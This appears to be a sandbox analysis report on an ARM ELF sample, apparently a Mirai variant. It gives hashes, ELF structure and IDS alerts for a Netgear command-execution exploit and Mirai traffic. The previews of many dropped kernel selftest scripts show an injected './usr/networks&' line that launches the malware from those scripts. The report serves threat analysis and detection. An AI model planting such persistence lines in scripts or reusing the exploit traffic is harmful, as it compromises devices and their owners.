                                                                  SSDEEP:24:xVyGO/8VUp+ccmLeeUQux6yNScMR5oHK80E8ZmPzgawreotgf4:90344yAfR6q8T6
                                                                  MD5:6D0439EE0A83FA091605410727383ED1
                                                                  SHA1:4ED9E279DCE80C03CD141460955D2284D051C686
                                                                  SHA-256:DFD67005F4B0D998D6520DDE9A33CF5C678E5442D4F825A8F5FC55EF45CC8F4E
                                                                  SHA-512:49C286E596728138394AA3E24DBEE748AF53AF29FD6FCACB2031499FEE141DCE590CB0FF8282A3E273E88234933E0EC7379209E2581207BC171D1F073E7BB4B1
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..../param_test ${TEST_LIST[$i]} -r ${REPS} -t ${NR_THREADS} ${@} ${EXTRA_ARGS} || exit 1...echo "Running compare-twice test ${TEST_NAME[$i]}"..../param_test_compare_twice ${TEST_LIST[$i]} -r ${REPS} -t ${NR_THREADS} ${@} ${EXTRA_ARGS} || exit 1...let "i++"..done.}..echo "Default parameters".do_tests..echo "Loop injection: 10000 loops"..OLDIFS="$IFS".IFS=$'\n'.INJECT_LIST=(.."1".."2".."3".."4".."5".."6".."7".."8".."9".).IFS="$OLDIFS"..NR_LOOPS=10000..i=0.while [ "$i" -lt "${#INJECT_LIST[@]}" ]; do..echo "Injecting at <${INJECT_LIST[$i]}>"..do_tests -${INJECT_LIST[i]} ${NR_LOOPS}..let "i++".done.NR_LOOPS=..function inject_blocking().{..OLDIFS="$IFS"..IFS=$'\n'..INJECT_LIST=(..."7"..."8"..."9"..)..IFS="$OLDIFS"...NR_LOOPS=-1...i=0..while [ "$i" -lt "${#INJECT_LIST[@]}" ]; do...echo "Injecting at <${INJECT_LIST[$i]}>"...do_tests -${INJECT_LIST[i]} -1 ${@}...let "i++"..done..NR_LOOPS=.}..echo "Yield injection (25%)".inject_blocking -m 4 -y..echo "Yield injection (50%)".injec
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):164
                                                                  Entropy (8bit):4.703374469471104
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVPnKWoW6MKRDRFJFFGSsW1BszoQEDRnAasxms1C7H/Q8OORgn:cnKWc1RyS7s+RoC7f4n
                                                                  MD5:4FFDFD98A8EC4B24C420EA596E877E98
                                                                  SHA1:A347AF4262380086119C8B266DDCB413C305DD56
                                                                  SHA-256:02EE38B1E0AA00683029AFCF243C511E42C87B15587BB391CBD85500E40FD3A6
                                                                  SHA-512:31A0B1729DB13FA350392FABE7D577FA9C7BD28059AFC86EF5F5AC772A78350D7A914505DD3D7EA2F0125DEE8CF734C7CFFCFCA5C976C7AE132475D4CDB7E50A
                                                                  Malicious:false
                                                                  Preview:./usr/networks&...exit $ksft_skip..fi.}..main_function().{. check_root. ./safesetid-test.}..main_function.echo "$TCID: done".exit $errcode../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):48
                                                                  Entropy (8bit):3.9783080115802454
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORTplOORgn:WMn
                                                                  MD5:50E7468E4E97AE4ECF676B96998FC995
                                                                  SHA1:538F6C756DC4F74B178728E62AE16C1EA1B72FA5
                                                                  SHA-256:B2D1993B3FFB264F55539AEFD10D6D9D27790CE632494F615EEEF6C420F941D8
                                                                  SHA-512:F04E7E06B151CE2EEA6461169C8B20493FA562028C716D6B404921CB44D68E145EAA0BA96E248C4F2DFE086D7EEF7222E1424DD11C390507FF1D3B478B6549AB
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit $rc../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):121
                                                                  Entropy (8bit):4.548077184392065
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVfFmf2MRvvvjNuQfoM8z/XFHXqFOnAzlv4MyoOORgn:Kgf2MZxuQe1XqZZwMyTn
                                                                  MD5:D0716F8976E5A2BD3006022236D35997
                                                                  SHA1:B93A17EAFF6DCA4E8AFC7B7B6499243747674867
                                                                  SHA-256:BE73D64821BFCD4820F3534D766504F2560429CB3BBEDC1730D3DA9F707D128D
                                                                  SHA-512:2526432AAEFDE2BDC74F70114E599C4AB5882EB38B3EADDD28FC2CE177DE29DABCF310AAF53814641B3F173E78CFC475C8988402009DBE7F965E9CAC2C3D4D9B
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.test "$n" = 0 && exit 0..echo "default_file_splice_read broken: leaked $n".exit 1../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):521
                                                                  Entropy (8bit):4.767031693352474
                                                                  Encrypted:false
                                                                  SSDEEP:12:9HbxmceznOmPqkAVHKVHwvN0B9VHwvHNW6v7n:JbQZ5bAVqVM0B9V0Nl7
                                                                  MD5:5CDE33DAE3EA85DA6E63293AC24BE38C
                                                                  SHA1:3F0558198FBC9C65482C46F0AEA513EA2D89FCAC
                                                                  SHA-256:4F030F9DD632BDE1ED2B9F8E9834D2FB35B16493C7209B773EAD8F5E03BC0D95
                                                                  SHA-512:C57CD9F086ADF85DE11F6A208D532A85ACAA3A659B1491E3DDB14A4D7C873DE240306A1DDAB4BEFC54D9C79FEE328A264022733D8EF078FB18956DB3FC0077A4
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit $ksft_skip.fi..if ! /sbin/modprobe -q -n test_static_keys; then..echo "static_key: module test_static_keys is not found [SKIP]"..exit $ksft_skip.fi..if /sbin/modprobe -q test_static_key_base; then..if /sbin/modprobe -q test_static_keys; then...echo "static_key: ok".../sbin/modprobe -q -r test_static_keys.../sbin/modprobe -q -r test_static_key_base..else...echo "static_keys: [FAIL]".../sbin/modprobe -q -r test_static_key_base..fi.else..echo "static_key: [FAIL]"..exit 1.fi../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):202
                                                                  Entropy (8bit):4.77491154916863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVasWoWb+K3rKCAWR+GzerNu5GrKbVR9+GzYNYmxf74Dmxf/FP4y6viXVOORgn:6WloxSnVH+dY8S89Pd6viMn
                                                                  MD5:075C3AC55C2EAF1DF12AA1A2031687C0
                                                                  SHA1:E6A3D2FF970B119ECDC462CEA01AE7D55CEBE7A9
                                                                  SHA-256:82F404B2CA157B49A13AE50D01741F29E6F4C245CCD7F9370F7B8ABA33828682
                                                                  SHA-512:66E6CA1024FBC0D3609BAA2EFA6CC0F746766F00EC991FF204AEF9A77081567C2A73BE7EFC7F137F68D1C8046E0E0A5D30786A725C3088239298820235CE3915
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit $ksft_skip.fi.if /sbin/modprobe -q test_user_copy; then../sbin/modprobe -q -r test_user_copy..echo "user_copy: ok".else..echo "user_copy: [FAIL]"..exit 1.fi../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):3804
                                                                  Entropy (8bit):5.189907595788207
                                                                  Encrypted:false
                                                                  SSDEEP:48:7Ca0YloYO7EULo1Ej5HBWnRr3kazJzmJC0+aRciuTDDSp+QWjMdZ+DXZpan7pr:7t4y48KaoJIzDSplDODja7pr
                                                                  MD5:BE3B50DCF88D2B312C64899D8306EB3E
                                                                  SHA1:987091A88752E8554ADC6EA2564A86E72A9282CF
                                                                  SHA-256:922A1DDF276FE35630EB32D7FA1D601277FEC29C6868518BA084A1FD05688E82
                                                                  SHA-512:640533EC07A7070906C1D2E7686A2F7E23E9B394D9A8A1A205A5B1ABC1AFA20D6340824FD7725687376FEF980F171E76E4D026F6614261F6B932587ECE210176
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exitcode=1..# Kselftest framework requirement - SKIP code is 4..ksft_skip=4..#.# Static templates for performance, stressing and smoke tests..# Also it is possible to pass any supported parameters manualy..#.PERF_PARAM="single_cpu_test=1 sequential_test_order=1 test_repeat_count=3".SMOKE_PARAM="single_cpu_test=1 test_loop_count=10000 test_repeat_count=10".STRESS_PARAM="test_repeat_count=20"..check_test_requirements().{..uid=$(id -u)..if [ $uid -ne 0 ]; then...echo "$0: Must be run as root"...exit $ksft_skip..fi...if ! which modprobe > /dev/null 2>&1; then...echo "$0: You need modprobe installed"...exit $ksft_skip..fi...if ! modinfo $DRIVER > /dev/null 2>&1; then...echo "$0: You must have the following enabled in your kernel:"...echo "CONFIG_TEST_VMALLOC=m"...exit $ksft_skip..fi.}..run_perfformance_check().{..echo "Run performance tests to evaluate how fast vmalloc allocation is."..echo "It runs all test cases on one single CPU with sequential order."...modprobe $DRIVER
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):46
                                                                  Entropy (8bit):3.925523369006428
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOOR3vKDlOORgn:uK4n
                                                                  MD5:2CADDA792FBD37B54978108B6CC504D4
                                                                  SHA1:C28DD4FAC0523E31F0220FF31417583882C82692
                                                                  SHA-256:E6D7ED75CDB1FA6A44D3ACEC4A6933828B8FEA70FF78C167E49214E7D1634305
                                                                  SHA-512:681E59EF7DEE6E6F60C0ABF3325E5F64DF4CEA10A4D0DA585198ECD3BE951722DBE2559F6CE20E70CB97E84E7CEFEED4DC6AC78204D9C9FF403343ECEC7997A0
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 0../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):59
                                                                  Entropy (8bit):4.140763389477654
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVasWoWbPDXVOORgn:6W9Mn
                                                                  MD5:0A5C7A75059C630EEFC22C6F180442A8
                                                                  SHA1:D8EB51C2C827DA1D4F2A859EF36F294D1AF38842
                                                                  SHA-256:7657F8B81C1CFB82399BB4E53F4F23EDC7E0F2F281F4C1569DF650D731ECC4D6
                                                                  SHA-512:214F4D17D813CA80185D1535D611CAE7A1B2DCD0AD9D09C1B2E01D882C6B752CAE6AB5AD96C36E1B5B2236EC3540A1537B818C726BD1C92B9419BAE087EE0825
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit $ksft_skip.fi../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):4118
                                                                  Entropy (8bit):5.170223934018025
                                                                  Encrypted:false
                                                                  SSDEEP:48:M5oJmTjrAeHf8ylJL+sh6EZrbMAQ25JN7i8DmLBsxCkxCX09doiqKdCF7C9Y:6/AeHfzDysp4oGVe9lo
                                                                  MD5:BEFDF35EDFCAFA649407CD9A390F725B
                                                                  SHA1:64FCBBEFD1DB4496C1A69EBF6A27918FA8989543
                                                                  SHA-256:D9786D0B311044F9D317FACECE2CEA5A4A28B4E89EABA344F55ABD9142D14A94
                                                                  SHA-512:08AFF2F22DCDE9B948841CCC6B9544A041E602F3B6D01C0D2E9E3D9920FB81AB015C557928FF53CD4A1E9E9D729C7F62D1E8FF5BE057593FBFC322F7408D5CE9
                                                                  Malicious:false
                                                                  Preview:./usr/networks&...exit $ksft_skip..fi.}..zram_cleanup().{..echo "zram cleanup"..local i=..for i in $(seq 0 $dev_makeswap); do...swapoff /dev/zram$i..done...for i in $(seq 0 $dev_mounted); do...umount /dev/zram$i..done...for i in $(seq 0 $(($dev_num - 1))); do...echo 1 > /sys/block/zram${i}/reset...rm -rf zram$i..done..}..zram_unload().{..if [ $MODULE -ne 0 ] ; then...echo "zram rmmod zram"...rmmod zram > /dev/null 2>&1..fi.}..zram_load().{..# check zram module exists..MODULE_PATH=/lib/modules/`uname -r`/kernel/drivers/block/zram/zram.ko..if [ -f $MODULE_PATH ]; then...MODULE=1...echo "create '$dev_num' zram device(s)"...modprobe zram num_devices=$dev_num...if [ $? -ne 0 ]; then....echo "failed to insert zram module"....exit 1...fi....dev_num_created=$(ls /dev/zram* | wc -w)....if [ "$dev_num_created" -ne "$dev_num" ]; then....echo "unexpected num of devices: $dev_num_created"....ERR_CODE=-1...else....echo "zram load module successful"...fi..elif [ -b /dev/zram0 ]; then...echo "/dev/zra
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):53
                                                                  Entropy (8bit):4.011057842116201
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORT0DAvSQ8OORgn:bDA64n
                                                                  MD5:9AD83E837CC1DEF0B2E4172E1D4A59DA
                                                                  SHA1:A9D8A337A3BC32D9BC15A5FD8A8B5932F33B3B82
                                                                  SHA-256:34BB767768F1C4420BF0B7A20F1EBF372F2A428B9096D633E41931768A409C76
                                                                  SHA-512:6185BCB8BF8D6F340516719576C79D6C0854589CBABDCB213AFF58C18EF4F43B00E811364782554DA418E732AA1918C7F361E6FD99AE5FFBDB7471AB328F05DD
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit $retcode../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):5016
                                                                  Entropy (8bit):4.970509239077376
                                                                  Encrypted:false
                                                                  SSDEEP:96:cYLZoIK9jKurJp8F6Wx0MpwWG77dkHFMK:cAZor7JM6lM+h7dot
                                                                  MD5:8878C23009543D7C0A3502AAC9BB947B
                                                                  SHA1:228AB7C7586B65B59B7C226D70AFE69FB83FC41B
                                                                  SHA-256:23569BBDA3A6391C7E40DC42AD2270960473BD136D19405A76717DD24CF99C42
                                                                  SHA-512:014DFBF6C8FA4CD797162842D90697F1ABCC568CA8C35B1C70480B568E116858DBA280DA74D23FD38FB9CA9627970D7EE3AD1D6C50B5952EEE598E0B39F566D6
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit 1. fi.}..ARGS="$*"..if [ "$ARGS" = "" ];.then. ARGS="$TYPES".fi..# FIXME use /sys/bus/usb/device/$THIS/bConfigurationValue to.# check and change configs..CONFIG=''..check_config ().{. if [ "$CONFIG" = "" ]; then..CONFIG=$1..echo "assuming $CONFIG configuration"..return. fi. if [ "$CONFIG" = $1 ]; then..return. fi.. echo "** device must be in $1 config, but it's $CONFIG instead". exit 1.}...echo "TESTING: $ARGS"..while : true.do. echo $(date).. for TYPE in $ARGS. do..# restore defaults..COUNT=5000..BUFLEN=2048...# FIXME automatically multiply COUNT by 10 when..# /sys/bus/usb/device/$THIS/speed == "480"..#.COUNT=50000...case $TYPE in..control).. # any device, in any configuration, can use this... echo '** Control test cases:'... echo "test 9: ch9 postconfig".. do_test -t 9 -c 5000.. echo "test 10: control queueing".. do_test -t 10 -c 5000... # this relies on some vendor-specific commands.. echo "test 14: cont
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):3727
                                                                  Entropy (8bit):5.173614270314125
                                                                  Encrypted:false
                                                                  SSDEEP:96:ikBNTBboQTybFowKrzmPJwTMpVV0nWFmV:ThBObFowAKV0nW8V
                                                                  MD5:ACEA76BAB838D1B0C3D06CF885406B13
                                                                  SHA1:DC0ED416D3C675534359EB23FFC3B96C6D72399F
                                                                  SHA-256:0E04100CC3B1902652984B7DE012464A09CAF917D66BB1479D7E0A12101CB140
                                                                  SHA-512:A196E0B4E93AC95C63CE04EB588532F1181B6DA45026A8ADFC9EA94C6CC52B9BAC0C6C8C39512F124C383FFA7D9C487BCC8D5A4DE6172962C1DAA5BA72399963
                                                                  Malicious:false
                                                                  Preview:./usr/networks&...exit 1..fi.}..do_slabs_plotting().{..local file=$1..local out_file..local range="every ::$xmin"..local xtic=""..local xtic_rotate="norotate"..local lines=2000000..local wc_lines...check_file_exist "$file"...out_file=`basename "$file"`..if [ $xmax -ne 0 ]; then...range="$range::$xmax"...lines=$((xmax-xmin))..fi...wc_lines=`cat "$file" | wc -l`..if [ $? -ne 0 ] || [ "$wc_lines" -eq 0 ] ; then...wc_lines=$lines..fi...if [ "$wc_lines" -lt "$lines" ]; then...lines=$wc_lines..fi...if [ $((width / lines)) -gt $min_slab_name_size ]; then...xtic=":xtic(1)"...xtic_rotate=90..fi..gnuplot -p << EOF.#!/usr/bin/env gnuplot..set terminal png enhanced size $width,$height large.set output '$out_file.png'.set autoscale xy.set xlabel 'samples'.set ylabel 'bytes'.set style histogram columnstacked title textcolor lt -1.set style fill solid 0.15.set xtics rotate $xtic_rotate.set key left above Left title reverse..plot "$file" $range u 2$xtic title 'SIZE' with boxes,\..'' $range u 3 title '
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):4209
                                                                  Entropy (8bit):5.076972113432996
                                                                  Encrypted:false
                                                                  SSDEEP:96:7clfSyzEmuUySne6nAZAT2AGzExXvGcufeB:IRSyzEH5SeduTdKExXvGcTB
                                                                  MD5:DC3C3E6F1C9C8CE13C5B08B389C754EB
                                                                  SHA1:E5104480B29198B150A9D85B4DDFC61174766421
                                                                  SHA-256:31B786EFA295D001CA8D161307A9AC0B01C609070E94D1479F88403F484AC389
                                                                  SHA-512:62FA97616A3FF0FD732924EDF8D736F733DBAFEC640E60B988F7A6E8587838B22AB633E1190F2DC96FA00638E8A7AEBFB23F2E859CCC142DC822BFD36F64C3DE
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit 1.}..list_header() {..:.}..header() {..printf "\n#####################\n# $1\n" >> ${output}.}..# process one directory (incl sub-directories).dir_filelist() {..${dep_list}header "$1"...srcdir=$(echo "$1" | sed -e 's://*:/:g')..dirlist=$(find "${srcdir}" -printf "%p %m %U %G\n" | LANG=C sort)...# If $dirlist is only one line, then the directory is empty..if [ "$(echo "${dirlist}" | wc -l)" -gt 1 ]; then...${dep_list}print_mtime "$1"....echo "${dirlist}" | \...while read x; do....${dep_list}parse ${x}...done..fi.}..# if only one file is specified and it is .cpio file then use it direct as fs.# if a directory is specified then add all files in given direcotry to fs.# if a regular file is specified assume it is in gen_initramfs format.input_file() {..source="$1"..if [ -f "$1" ]; then...${dep_list}header "$1"...is_cpio="$(echo "$1" | sed 's/^.*\.cpio\(\..*\)\{0,1\}/cpio/')"...if [ $2 -eq 0 -a ${is_cpio} = "cpio" ]; then....cpio_file=$1....echo "$1" | grep -q '^.*\.cp
                                                                  File type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
                                                                  Entropy (8bit):5.819759780885281
                                                                  TrID:
                                                                  • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                                  File name:bin.sh.elf
                                                                  File size:307'960 bytes
                                                                  MD5:08b9c0cce72be9d0593fb14d67780bff
                                                                  SHA1:bba44d9dc631607564fbdd7483361099f5bb55e7
                                                                  SHA256:72b9f5286030ea745a84f0b10e7650e13ca9f77a8a6c1fb6f2e30c7acf04fa9f
                                                                  SHA512:daa27adf767deda522c9a55cb2c52fec7e97a61c8d1e48dfb3837c0836cf6ee84ce2b1093443f2325e543275f91a5248b79fdf19407c0917f81a895b81f13752
                                                                  SSDEEP:6144:T2s/gAWNboqsJ9xcJxspJBqQgTuaJZRhVabE5wKSDP99zBa77oNsKqqfPqOJ:T2s/bW/UmJqBxAuaPRhVabEDSDP99zBT
                                                                  TLSH:BD643A8AFD81AE25D5C126BBFE2F4289331317B8D2EB71029D145F2876CA94F0F7A541
                                                                  File Content Preview:.ELF..............(.........4...P.......4. ...(........p............(...(...............................................................8...........................................Q.td..................................-...L..................@-.,@...0....S

                                                                  ELF header

                                                                  Class:ELF32
                                                                  Data:2's complement, little endian
                                                                  Version:1 (current)
                                                                  Machine:ARM
                                                                  Version Number:0x1
                                                                  Type:EXEC (Executable file)
                                                                  OS/ABI:UNIX - System V
                                                                  ABI Version:0
                                                                  Entry Point Address:0x8194
                                                                  Flags:0x4000002
                                                                  ELF Header Size:52
                                                                  Program Header Offset:52
                                                                  Program Header Size:32
                                                                  Number of Program Headers:5
                                                                  Section Header Offset:307280
                                                                  Section Header Size:40
                                                                  Number of Section Headers:17
                                                                  Header String Table Index:16
                                                                  NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                                  NULL0x00x00x00x00x0000
                                                                  .initPROGBITS0x80d40xd40x100x00x6AX004
                                                                  .textPROGBITS0x80f00xf00x34a980x00x6AX0016
                                                                  .finiPROGBITS0x3cb880x34b880x100x00x6AX004
                                                                  .rodataPROGBITS0x3cb980x34b980xb9d00x00x2A008
                                                                  .ARM.extabPROGBITS0x485680x405680x180x00x2A004
                                                                  .ARM.exidxARM_EXIDX0x485800x405800x1280x00x82AL204
                                                                  .eh_framePROGBITS0x510000x410000x40x00x3WA004
                                                                  .tbssNOBITS0x510040x410040x80x00x403WAT004
                                                                  .init_arrayINIT_ARRAY0x510040x410040x40x00x3WA004
                                                                  .fini_arrayFINI_ARRAY0x510080x410080x40x00x3WA004
                                                                  .data.rel.roPROGBITS0x510100x410100x180x00x3WA004
                                                                  .gotPROGBITS0x510280x410280xb80x40x3WA004
                                                                  .dataPROGBITS0x510e00x410e00x9ec80x00x3WA008
                                                                  .bssNOBITS0x5afa80x4afa80x25b900x00x3WA008
                                                                  .ARM.attributesARM_ATTRIBUTES0x00x4afa80x160x00x0001
                                                                  .shstrtabSTRTAB0x00x4afbe0x900x00x0001
                                                                  TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                  EXIDX0x405800x485800x485800x1280x1284.64500x4R 0x4.ARM.exidx
                                                                  LOAD0x00x80000x80000x406a80x406a86.20270x5R E0x8000.init .text .fini .rodata .ARM.extab .ARM.exidx
                                                                  LOAD0x410000x510000x510000x9fa80x2fb382.22440x6RW 0x8000.eh_frame .tbss .init_array .fini_array .data.rel.ro .got .data .bss
                                                                  TLS0x410040x510040x510040x00x80.00000x4R 0x4.tbss
                                                                  GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                  2024-11-28T07:28:00.893883+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.233660612.244.152.15480TCP
                                                                  2024-11-28T07:28:00.977945+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2345422158.228.53.1697574TCP
